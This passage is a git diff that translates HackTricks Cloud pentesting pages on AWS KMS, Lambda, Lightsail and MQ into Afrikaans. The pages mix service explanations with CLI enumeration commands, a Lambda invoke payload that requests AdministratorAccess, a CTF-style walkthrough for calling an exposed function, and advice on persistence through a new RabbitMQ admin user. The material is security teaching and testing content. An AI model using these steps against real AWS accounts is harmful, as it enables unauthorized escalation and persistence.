-By **default:**
+Deur **standaard:**
 
-- It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM.
+- Dit gee die **IAM van die** **AWS rekening wat die KMS sleutel besit toegang** om die toegang tot die KMS sleutel via IAM te bestuur.
 
-  Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one.
+In teenstelling met ander AWS hulpbronbeleide, 'n AWS **KMS sleutelbeleid gee nie outomaties toestemming aan enige van die principals van die rekening nie**. Om toestemming aan rekening administrateurs te gee, moet die **sleutelbeleid 'n eksplisiete verklaring insluit** wat hierdie toestemming bied, soos hierdie een.
 
-  - Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work.
+- Sonder om die rekening toe te laat (`"AWS": "arn:aws:iam::111122223333:root"`) sal IAM toestemmings nie werk nie.
 
-- It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy.
+- Dit **laat die rekening toe om IAM beleide te gebruik** om toegang tot die KMS sleutel toe te laat, benewens die sleutelbeleid.
 
-  **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective.
+**Sonder hierdie toestemming is IAM beleide wat toegang tot die sleutel toelaat, ondoeltreffend**, alhoewel IAM beleide wat toegang tot die sleutel ontken steeds doeltreffend is.
 
-- It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted.
-
-**Default policy** example:
+- Dit **verlaag die risiko dat die sleutel onbestuurbaar word** deur toegangbeheer toestemming aan die rekening administrateurs te gee, insluitend die rekening wortel gebruiker, wat nie verwyder kan word nie.
 
+**Standaard beleid** voorbeeld:
 ```json
 {
-  "Sid": "Enable IAM policies",
-  "Effect": "Allow",
-  "Principal": {
-    "AWS": "arn:aws:iam::111122223333:root"
-  },
-  "Action": "kms:*",
-  "Resource": "*"
+"Sid": "Enable IAM policies",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::111122223333:root"
+},
+"Action": "kms:*",
+"Resource": "*"
 }
 ```
-
 > [!WARNING]
-> If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**.
+> As die **rekening toegelaat is** (`"arn:aws:iam::111122223333:root"`) sal 'n **hoofpersoon** van die rekening **nog steeds IAM-toestemmings nodig hê** om die KMS-sleutel te gebruik. As die **ARN** van 'n rol byvoorbeeld **spesifiek toegelaat is** in die **Sleutelbeleid**, het daardie rol **nie IAM-toestemmings nodig nie**.
 
 <details>
 
-<summary>Policy Details</summary>
+<summary>Beleid Besonderhede</summary>
 
-Properties of a policy:
+Eienskappe van 'n beleid:
 
-- JSON based document
-- Resource --> Affected resources (can be "\*")
-- Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions)
-- Effect --> Allow/Deny
-- Principal --> arn affected
-- Conditions (optional) --> Condition to give the permissions
+- JSON-gebaseerde dokument
+- Hulpbron --> Aangetaste hulpbronne (kan wees "\*")
+- Aksie --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (toestemmings)
+- Effek --> Toelaat/Weier
+- Hoofpersoon --> arn aangetaste
+- Voorwaardes (opsioneel) --> Voorwaarde om die toestemmings te gee
 
-Grants:
+Toekennings:
 
-- Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...)
-- After the grant is created a GrantToken and a GratID are issued
+- Laat toe om jou toestemmings aan 'n ander AWS-hoofpersoon binne jou AWS-rekening te delegeer. Jy moet dit skep met die AWS KMS API's. Dit kan die CMK-identifiseerder, die toekenningshoofpersoon en die vereiste vlak van operasie (Decrypt, Encrypt, GenerateDataKey...) aangedui word.
+- Nadat die toekenning geskep is, word 'n GrantToken en 'n GrantID uitgereik.
 
-**Access**:
+**Toegang**:
 
-- Via **key policy** -- If this exist, this takes **precedent** over the IAM policy
-- Via **IAM policy**
-- Via **grants**
+- Via **sleutelbeleid** -- As dit bestaan, het dit **prioriteit** bo die IAM-beleid
+- Via **IAM-beleid**
+- Via **toekennings**
 
 </details>
 
-### Key Administrators
+### Sleutel Administrators
 
-Key administrator by default:
+Sleuteladministrateur per standaard:
 
-- Have access to manage KMS but not to encrypt or decrypt data
-- Only IAM users and roles can be added to Key Administrators list (not groups)
-- If external CMK is used, Key Administrators have the permission to import key material
+- Het toegang om KMS te bestuur, maar nie om data te enkripteer of te dekripteer nie
+- Slegs IAM-gebruikers en rolle kan by die Sleuteladministratorslys gevoeg word (nie groepe nie)
+- As 'n eksterne CMK gebruik word, het Sleuteladministrators die toestemming om sleutelmateriaal te invoer
 
-### Rotation of CMKs
+### Rotasie van CMK's
 
-- The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases.
-- **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed.
-- **Older keys are retained** to decrypt data that was encrypted prior to the rotation
-- In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**.
-- If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled.
+- Hoe langer dieselfde sleutel in plek gelaat word, hoe meer data word met daardie sleutel geënkripteer, en as daardie sleutel gecompromitteer word, is die blast area van data wyer in gevaar. Benewens dit, hoe langer die sleutel aktief is, hoe groter is die waarskynlikheid dat dit gecompromitteer sal word.
+- **KMS roteer kliëntsleutels elke 365 dae** (of jy kan die proses handmatig uitvoer wanneer jy wil) en **sleutels bestuur deur AWS elke 3 jaar** en hierdie tyd kan nie verander word nie.
+- **Ou sleutels word behou** om data te dekripteer wat voor die rotasie geënkripteer is.
+- In 'n breek, sal die rotasie van die sleutel nie die bedreiging verwyder nie, aangesien dit moontlik sal wees om al die data wat met die gecompromitteerde sleutel geënkripteer is, te dekripteer. Tog, die **nuwe data sal geënkripteer word met die nuwe sleutel**.
+- As **CMK** in 'n toestand van **gedeaktiveer** of **hangende** **verwydering** is, sal KMS **nie 'n sleutelrotasie uitvoer nie** totdat die CMK heraktiveer of die verwydering gekanselleer word.
 
-#### Manual rotation
+#### Handmatige rotasie
 
-- A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID.
-- To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to.
-- You need to **keep old keys to decrypt old files** encrypted with it.
+- 'n **Nuwe CMK moet geskep word**, dan, 'n nuwe CMK-ID word geskep, so jy sal **moet opdateer** enige **aansoek** om die nuwe CMK-ID te **verwys**.
+- Om hierdie proses makliker te maak, kan jy **aliases gebruik om na 'n sleutel-id te verwys** en dan net die sleutel wat die alias verwys, opdateer.
+- Jy moet **ou sleutels hou om ou lêers te dekripteer** wat daarmee geënkripteer is.
 
-You can import keys from your on-premises key infrastructure .
+Jy kan sleutels van jou plaaslike sleutel-infrastruktuur invoer.
 
-### Other relevant KMS information
+### Ander relevante KMS-inligting
 
-KMS is priced per number of encryption/decryption requests received from all services per month.
+KMS word geprys per aantal enkripsie/dekripsie versoeke wat van alle dienste per maand ontvang word.
 
-KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS.
+KMS het volle oudit en nakoming **integrasie met CloudTrail**; dit is waar jy al die veranderinge wat op KMS uitgevoer is, kan oudit.
 
-With KMS policy you can do the following:
+Met KMS-beleid kan jy die volgende doen:
 
-- Limit who can create data keys and which services have access to use these keys
-- Limit systems access to encrypt only, decrypt only or both
-- Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions).
+- Beperk wie data sleutels kan skep en watter dienste toegang het om hierdie sleutels te gebruik
+- Beperk stelsels se toegang om slegs te enkripteer, slegs te dekripteer of albei
+- Definieer om stelsels toe te laat om sleutels oor streke te benader (alhoewel dit nie aanbeveel word nie, aangesien 'n mislukking in die streek wat KMS huisves, die beskikbaarheid van stelsels in ander streke sal beïnvloed).
 
-You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region.
-
-### Enumeration
+Jy kan nie sleutels oor streke sinkroniseer of beweeg/kopieer nie; jy kan slegs reëls definieer om toegang oor streke toe te laat.
 
+### Enumerasie
 ```bash
 aws kms list-keys
 aws kms list-key-policies --key-id <id>
@@ -132,7 +129,6 @@ aws kms describe-key --key-id <id>
 aws kms get-key-policy --key-id <id> --policy-name <name> # Default policy name is "default"
 aws kms describe-custom-key-stores
 ```
-
 ### Privesc
 
 {{#ref}}
@@ -151,12 +147,8 @@ aws kms describe-custom-key-stores
 ../aws-persistence/aws-kms-persistence.md
 {{#endref}}
 
-## References
+## Verwysings
 
 - [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md
index 03fa1aac8..4b2172713 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md
@@ -4,59 +4,58 @@
 
 ## Lambda
 
-Amazon Web Services (AWS) Lambda is described as a **compute service** that enables the execution of code without the necessity for server provision or management. It is characterized by its ability to **automatically handle resource allocation** needed for code execution, ensuring features like high availability, scalability, and security. A significant aspect of Lambda is its pricing model, where **charges are based solely on the compute time utilized**, eliminating the need for initial investments or long-term obligations.
+Amazon Web Services (AWS) Lambda word beskryf as 'n **rekenaar diens** wat die uitvoering van kode moontlik maak sonder die noodsaaklikheid van bediener voorsiening of bestuur. Dit word gekenmerk deur sy vermoë om **outomaties hulpbronne toe te ken** wat nodig is vir kode uitvoering, wat funksies soos hoë beskikbaarheid, skaalbaarheid en sekuriteit verseker. 'n Belangrike aspek van Lambda is sy prysmodel, waar **heffings slegs gebaseer is op die rekenaartyd wat gebruik word**, wat die noodsaaklikheid van aanvanklike belegging of langtermyn verpligtinge uitskakel.
 
-To call a lambda it's possible to call it as **frequently as you wants** (with Cloudwatch), **expose** an **URL** endpoint and call it, call it via **API Gateway** or even based on **events** such as **changes** to data in a **S3** bucket or updates to a **DynamoDB** table.
+Om 'n lambda aan te roep, is dit moontlik om dit **so gereeld soos jy wil** aan te roep (met Cloudwatch), **'n URL** eindpunt bloot te stel en dit aan te roep, dit via **API Gateway** aan te roep of selfs gebaseer op **gebeurtenisse** soos **veranderings** aan data in 'n **S3** emmer of opdaterings aan 'n **DynamoDB** tabel.
 
-The **code** of a lambda is stored in **`/var/task`**.
+Die **kode** van 'n lambda word gestoor in **`/var/task`**.
 
 ### Lambda Aliases Weights
 
-A Lambda can have **several versions**.\
-And it can have **more than 1** version exposed via **aliases**. The **weights** of **each** of the **versions** exposed inside and alias will decide **which alias receive the invocation** (it can be 90%-10% for example).\
-If the code of **one** of the aliases is **vulnerable** you can send **requests until the vulnerable** versions receives the exploit.
+'n Lambda kan **verskeie weergawes** hê.\
+En dit kan **meer as 1** weergawe hê wat blootgestel word via **aliases**. Die **gewigte** van **elke** van die **weergawes** wat binne 'n alias blootgestel word, sal besluit **watter alias die oproep ontvang** (dit kan 90%-10% wees byvoorbeeld).\
+As die kode van **een** van die aliases **kwetsbaar** is, kan jy **versoeke stuur totdat die kwesbare** weergawe die ontploffing ontvang.
 
 ![](<../../../images/image (223).png>)
 
 ### Resource Policies
 
-Lambda resource policies allow to **give access to other services/accounts to invoke** the lambda for example.\
-For example this is the policy to allow **anyone to access a lambda exposed via URL**:
+Lambda hulpbronbeleide laat toe om **toegang te gee aan ander dienste/rekeninge om die** lambda aan te roep.\
+Byvoorbeeld, dit is die beleid om **enigeen toe te laat om 'n lambda wat via URL blootgestel is, te benader**:
 
 <figure><img src="https://lh4.googleusercontent.com/4PNFKBdzr3nMrPqeKkTslgwWDKxkXMdQ1SNdv7NPHykj3GX8wODrQyXOFbjk4fxHfZ8pDm5ijWgk2Vq2EGXiPRT3TQfZf1fHycvdEKBuDxJDYos1CJeMHXSeg86ZB-Ol7CNtten6xkVFQj6AhDUEWNQJrQ=s2048" alt=""><figcaption></figcaption></figure>
 
-Or this to allow an API Gateway to invoke it:
+Of dit om 'n API Gateway toe te laat om dit aan te roep:
 
 <figure><img src="https://lh3.googleusercontent.com/Su0JlR0wBqb-99Z4N_2-_kMlX0Xzx2n_GpZuOPW5IeXR3FYbm8OHFDM3Ora1BpXiSjHpDVUlq4yEyXwaI3nBuze6DJ-wRf2ATsCuWbq0wuBCd34E9uIpqwheE6Cc_PopviI_93O_j2ZKXc1-AJtsBoLVUw=s2048" alt=""><figcaption></figcaption></figure>
 
 ### Lambda Database Proxies
 
-When there are **hundreds** of **concurrent lambda requests**, if each of them need to **connect and close a connection to a database**, it's just not going to work (lambdas are stateless, cannot maintain connections open).\
-Then, if your **Lambda functions interact with RDS Proxy instead** of your database instance. It handles the connection pooling necessary for scaling many simultaneous connections created by concurrent Lambda functions. This allows your Lambda applications to **reuse existing connections**, rather than creating new connections for every function invocation.
+Wanneer daar **honderde** **gelyktydige lambda versoeke** is, as elkeen daarvan moet **verbinding maak en 'n verbinding met 'n databasis sluit**, gaan dit eenvoudig nie werk nie (lambdas is staatloos, kan nie verbindings oop hou nie).\
+Dan, as jou **Lambda funksies met RDS Proxy in plaas van** jou databasis instansie interaksie het. Dit hanteer die verbinding pooling wat nodig is om baie gelyktydige verbindings wat deur gelyktydige Lambda funksies geskep word, te skaal. Dit laat jou Lambda toepassings toe om **bestaande verbindings te hergebruik**, eerder as om nuwe verbindings vir elke funksie oproep te skep.
 
 ### Lambda EFS Filesystems
 
-To preserve and even share data **Lambdas can access EFS and mount them**, so Lambda will be able to read and write from it.
+Om data te bewaar en selfs te deel, **kan Lambdas EFS benader en dit monteer**, sodat Lambda in staat sal wees om daarvan te lees en te skryf.
 
 ### Lambda Layers
 
-A Lambda _layer_ is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files.
+'n Lambda _laag_ is 'n .zip lêer argief wat **addisionele kode** of ander inhoud kan bevat. 'n Laag kan biblioteke, 'n [aangepaste runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, of konfigurasielêers bevat.
 
-It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment.
+Dit is moontlik om tot **vyf lae per funksie** in te sluit. Wanneer jy 'n laag in 'n funksie insluit, word die **inhoud na die `/opt`** gids in die uitvoeringsomgewing onttrek.
 
-By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version.
+Deur **standaard**, is die **lae** wat jy skep **privaat** vir jou AWS rekening. Jy kan kies om 'n laag met ander rekeninge te **deel** of om die laag **publiek** te maak. As jou funksies 'n laag gebruik wat 'n ander rekening gepubliseer het, kan jou funksies **voortgaan om die laag weergawe te gebruik nadat dit verwyder is, of nadat jou toestemming om toegang tot die laag herroep is**. Dit is egter nie moontlik om 'n nuwe funksie te skep of funksies te werk met 'n verwyderde laag weergawe nie.
 
-Functions deployed as a container image do not use layers. Instead, you package your preferred runtime, libraries, and other dependencies into the container image when you build the image.
+Funksies wat as 'n houer beeld ontplooi word, gebruik nie lae nie. In plaas daarvan, pak jy jou verkiesde runtime, biblioteke, en ander afhanklikhede in die houer beeld wanneer jy die beeld bou.
 
 ### Lambda Extensions
 
-Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**.
+Lambda uitbreidings verbeter funksies deur te integreer met verskeie **monitering, waaksaamheid, sekuriteit, en bestuur gereedskap**. Hierdie uitbreidings, bygevoeg via [.zip argiewe met behulp van Lambda lae](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) of ingesluit in [houer beeld ontplooiings](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), werk in twee modi: **intern** en **ekstern**.
 
-- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**.
-- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**.
+- **Interne uitbreidings** meng met die runtime proses, wat sy opstart manipuleer met behulp van **taalspesifieke omgewing veranderlikes** en **wrapper skripte**. Hierdie aanpassing geld vir 'n reeks runtimes, insluitend **Java Correto 8 en 11, Node.js 10 en 12, en .NET Core 3.1**.
+- **Eksterne uitbreidings** loop as aparte prosesse, wat operasionele belyning met die Lambda funksie se lewensiklus handhaaf. Hulle is versoenbaar met verskeie runtimes soos **Node.js 10 en 12, Python 3.7 en 3.8, Ruby 2.5 en 2.7, Java Corretto 8 en 11, .NET Core 3.1**, en **aangepaste runtimes**.
 
 ### Enumeration
-
 ```bash
 aws lambda get-account-settings
 
@@ -93,11 +92,9 @@ aws lambda list-event-source-mappings
 aws lambda list-code-signing-configs
 aws lambda list-functions-by-code-signing-config --code-signing-config-arn <arn>
 ```
+### Roep 'n lambda aan
 
-### Invoke a lambda
-
-#### Manual
-
+#### Handmatig
 ```bash
 # Invoke function
 aws lambda invoke --function-name FUNCTION_NAME /tmp/out
@@ -106,83 +103,70 @@ aws lambda invoke --function-name FUNCTION_NAME /tmp/out
 ## user_name = event['user_name']
 aws lambda invoke --function-name <name> --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess], "user_name": "sdf"}' out.txt
 ```
-
-#### Via exposed URL
-
+#### Deur blootgestelde URL
 ```bash
 aws lambda list-function-url-configs --function-name <function_name> #Get lambda URL
 aws lambda get-function-url-config   --function-name <function_name> #Get lambda URL
 ```
+#### Roep Lambda-funksie aan via URL
 
-#### Call Lambda function via URL
-
-Now it's time to find out possible lambda functions to execute:
-
+Nou is dit tyd om moontlike lambda-funksies te vind om uit te voer:
 ```
 aws --region us-west-2 --profile level6 lambda list-functions
 ```
-
 ![](<../../../images/image (262).png>)
 
-A lambda function called "Level6" is available. Lets find out how to call it:
-
+'n Lambda-funksie genaamd "Level6" is beskikbaar. Kom ons vind uit hoe om dit aan te roep:
 ```bash
 aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6
 ```
-
 ![](<../../../images/image (102).png>)
 
-Now, that you know the name and the ID you can get the Name:
-
+Nou, dat jy die naam en die ID ken, kan jy die Naam kry:
 ```bash
 aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"
 ```
-
 ![](<../../../images/image (237).png>)
 
-And finally call the function accessing (notice that the ID, Name and function-name appears in the URL): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6)
+En uiteindelik bel die funksie wat toegang verkry (let op dat die ID, Naam en funksie-naam in die URL verskyn): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6)
 
 `URL:`**`https://<rest-api-id>.execute-api.<region>.amazonaws.com/<stageName>/<funcName>`**
 
-#### Other Triggers
+#### Ander Triggers
 
-There are a lot of other sources that can trigger a lambda
+Daar is baie ander bronne wat 'n lambda kan aktiveer
 
 <figure><img src="../../../images/image (167).png" alt=""><figcaption></figcaption></figure>
 
 ### Privesc
 
-In the following page you can check how to **abuse Lambda permissions to escalate privileges**:
+Op die volgende bladsy kan jy kyk hoe om **Lambda-toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-lambda-privesc.md
 {{#endref}}
 
-### Unauthenticated Access
+### Ongeauthentiseerde Toegang
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md
 {{#endref}}
 
-### Post Exploitation
+### Post Exploitatie
 
 {{#ref}}
 ../aws-post-exploitation/aws-lambda-post-exploitation/
 {{#endref}}
 
-### Persistence
+### Volharding
 
 {{#ref}}
 ../aws-persistence/aws-lambda-persistence/
 {{#endref}}
 
-## References
+## Verwysings
 
 - [https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer)
 - [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md
index 9f5ccb1ab..84cb65489 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md
@@ -4,11 +4,10 @@
 
 ## AWS - Lightsail
 
-Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\
-It's a **minimal EC2 + Route53 + ECS**.
+Amazon Lightsail bied 'n **maklike**, liggewig manier vir nuwe wolkgebruikers om voordeel te trek uit AWS se wolkrekenaardienste. Dit stel jou in staat om algemene en pasgemaakte webdienste in sekondes te ontplooi via **VMs** (**EC2**) en **houers**.\
+Dit is 'n **minimale EC2 + Route53 + ECS**.
 
 ### Enumeration
-
 ```bash
 # Instances
 aws lightsail get-instances #Get all
@@ -29,14 +28,13 @@ aws lightsail get-load-balancers
 aws lightsail get-static-ips
 aws lightsail get-key-pairs
 ```
+### Analiseer Snapshotte
 
-### Analyse Snapshots
-
-It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration).
+Dit is moontlik om **instansie en relationele databasis snapshotte van lightsail** te genereer. Daarom kan jy dit op dieselfde manier nagaan as wat jy [**EC2 snapshotte**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) en [**RDS snapshotte**](aws-relational-database-rds-enum.md#enumeration) nagaan.
 
 ### Metadata
 
-**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS.
+**Metadata-eindpunt is toeganklik vanaf lightsail**, maar die masjiene loop in 'n **AWS-rekening wat deur AWS bestuur word**, so jy beheer nie **watter toestemmings toegeken word** nie. As jy egter 'n manier vind om dit te benut, sal jy direk AWS benut.
 
 ### Privesc
 
@@ -44,20 +42,16 @@ It's possible to generate **instance and relational database snapshots from ligh
 ../aws-privilege-escalation/aws-lightsail-privesc.md
 {{#endref}}
 
-### Post Exploitation
+### Post Exploitatie
 
 {{#ref}}
 ../aws-post-exploitation/aws-lightsail-post-exploitation.md
 {{#endref}}
 
-### Persistence
+### Volharding
 
 {{#ref}}
 ../aws-persistence/aws-lightsail-persistence.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md
index 8504db545..274ad89fe 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md
@@ -4,28 +4,27 @@
 
 ## Amazon MQ
 
-### Introduction to Message Brokers
+### Inleiding tot Boodskap Brokers
 
-**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates.
+**Boodskap brokers** dien as tussenpersoon, wat kommunikasie tussen verskillende sagteware stelsels fasiliteer, wat op verskillende platforms gebou kan wees en in verskillende tale geprogrammeer kan wees. **Amazon MQ** vereenvoudig die ontplooiing, werking en onderhoud van boodskap brokers op AWS. Dit bied bestuurde dienste vir **Apache ActiveMQ** en **RabbitMQ**, wat naatlose voorsiening en outomatiese sagteware weergawe-opdaterings verseker.
 
 ### AWS - RabbitMQ
 
-RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers.
+RabbitMQ is 'n prominente **boodskap-rygagte sagteware**, ook bekend as 'n _boodskap broker_ of _ry bestuurder_. Dit is fundamenteel 'n stelsel waar rye geconfigureer word. Toepassings koppel met hierdie rye om **boodskappe te stuur en te ontvang**. Boodskappe in hierdie konteks kan 'n verskeidenheid inligting dra, wat wissel van opdragte om prosesse op ander toepassings (potensieel op verskillende bedieners) te begin tot eenvoudige teksboodskappe. Die boodskappe word deur die ry-bestuurder sagteware gehou totdat dit deur 'n ontvangende toepassing opgehaal en verwerk word. AWS bied 'n maklik-om-te-gebruik oplossing vir die gasheer en bestuur van RabbitMQ bedieners.
 
 ### AWS - ActiveMQ
 
-Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can:
+Apache ActiveMQ® is 'n toonaangewende oopbron, Java-gebaseerde **boodskap broker** bekend vir sy veelsydigheid. Dit ondersteun verskeie bedryfstandaard protokolle, wat uitgebreide kliënt-compatibiliteit oor 'n wye verskeidenheid tale en platforms bied. Gebruikers kan:
 
-- Connect with clients written in JavaScript, C, C++, Python, .Net, and more.
-- Leverage the **AMQP** protocol to integrate applications from different platforms.
-- Use **STOMP** over websockets for web application message exchanges.
-- Manage IoT devices with **MQTT**.
-- Maintain existing **JMS** infrastructure and extend its capabilities.
+- Koppel met kliënte geskryf in JavaScript, C, C++, Python, .Net, en meer.
+- Die **AMQP** protokol benut om toepassings van verskillende platforms te integreer.
+- **STOMP** oor websockets gebruik vir webtoepassing boodskapuitruil.
+- IoT-toestelle met **MQTT** bestuur.
+- Bestaande **JMS** infrastruktuur onderhou en sy vermoëns uitbrei.
 
-ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements.
-
-## Enumeration
+ActiveMQ se robuustheid en buigsaamheid maak dit geskik vir 'n verskeidenheid boodskap vereistes.
 
+## Enumerasie
 ```bash
 # List brokers
 aws mq list-brokers
@@ -48,9 +47,8 @@ aws mq list-configurations
 # Creacte Active MQ user
 aws mq create-user --broker-id <value> --password <value> --username <value> --console-access
 ```
-
 > [!WARNING]
-> TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this)
+> TODO: Dui aan hoe om RabbitMQ en ActiveMQ intern te enumereer en hoe om in alle rye te luister en data te stuur (stuur PR as jy weet hoe om dit te doen)
 
 ## Privesc
 
@@ -58,23 +56,19 @@ aws mq create-user --broker-id <value> --password <value> --username <value> --c
 ../aws-privilege-escalation/aws-mq-privesc.md
 {{#endref}}
 
-## Unauthenticated Access
+## Ongeauthentiseerde Toegang
 
 {{#ref}}
 ../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
 {{#endref}}
 
-## Persistence
+## Volharding
 
-If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges.
+As jy die akrediteerbesonderhede het om toegang tot die RabbitMQ-webkonsol te verkry, kan jy 'n nuwe gebruiker met administratiewe regte skep.
 
-## References
+## Verwysings
 
 - [https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html](https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html)
 - [https://activemq.apache.org/](https://activemq.apache.org/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
index 42c7ca640..4c2185014 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
@@ -4,22 +4,21 @@
 
 ## Amazon MSK
 
